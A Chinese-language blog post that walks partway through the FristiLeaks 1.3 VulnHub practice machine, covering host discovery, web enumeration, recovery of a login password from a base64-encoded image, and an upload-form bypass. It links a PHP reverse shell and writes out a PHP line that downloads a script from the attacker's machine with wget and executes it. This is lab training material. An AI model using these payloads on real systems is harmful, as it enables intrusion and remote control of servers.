靶机:FristiLeaks_1.3

下载连接
https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent https://download.vulnhub.com/fristilea
ks/FristiLeaks_1.3.ova
运行环境
Virtualbox (二选一) Vnware Workstation player
VMware用户将需要手动将VM的靶机的MAC地址编辑为:08:00:27:A5:A6:76
配置成功即可出现ip地址
这里我用的是nat模式
在这里插入图片描述
使用netdiscove -r 192.168.88.0/24
主要的主动模式,一般通过一个已知的IP来扫描一段IP
在这里插入图片描述
nmap发现只开放了80端口,所以细扫一下80端口
在这里插入图片描述
进入web站点,查看页面源码,在这里插入图片描述

好像是要在四小时内获取flag

根据nmap扫描结果存在robots.txt文件
在这里插入图片描述

访问三个路径,都是相同的图片
dib扫描下目录,发现http://192.168.88.138/images/
在这里插入图片描述
这张图片似乎是个提示,我们进入http://192.168.88.138/fristi/
在这里插入图片描述
一个登录窗口
在这里插入图片描述
查看页面源代码我们得知 页面是叫eezeepz的人留下的,那么那就有这种可能:他也许用eezeepz当做他的用户名或者密码。还有
超级leet密码登录测试页面。我们对图像使用base64编码,因此它们在HTML中是内联的。我在网上看到,这是一个很好的方法。
在这里插入图片描述
页面下方还有一个base64加密文档
在这里插入图片描述

将源代码下文的绿色字体复制进一个文件里
在这里插入图片描述
使用base64命令解码
在这里插入图片描述

根据文件格式,转换为png格式
在这里插入图片描述

在根目录下查看图片
在这里插入图片描述
试试 username:eezeepz password:keKkeKKeKKeKkEkkEk
不出所料,这个就是密码 登录
在这里插入图片描述
发现一个文件上传的功能点 这时我们要下载反弹shell的脚本木马
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
解压完成后
在这里插入图片描述

修改此php文件的目标IP地址和监听端口

在这里插入图片描述

开启监听
在这里插入图片描述

将其后缀加上.jpg,上传
在这里插入图片描述
上传成功
在这里插入图片描述
使用nv -nlvp 8888 监听发现监听不了
在这里插入图片描述
百度了好久,发现新办法
在Kali上写个PHP反弹shell的脚本;并开启Apache服务
在这里插入图片描述
service apache2 start

在物理机上写个下载并执行该脚本的PHP代码

<?php system("wget 192.168.88.135/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>

在这里插入图片描述
目前就做到这,以后再补

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值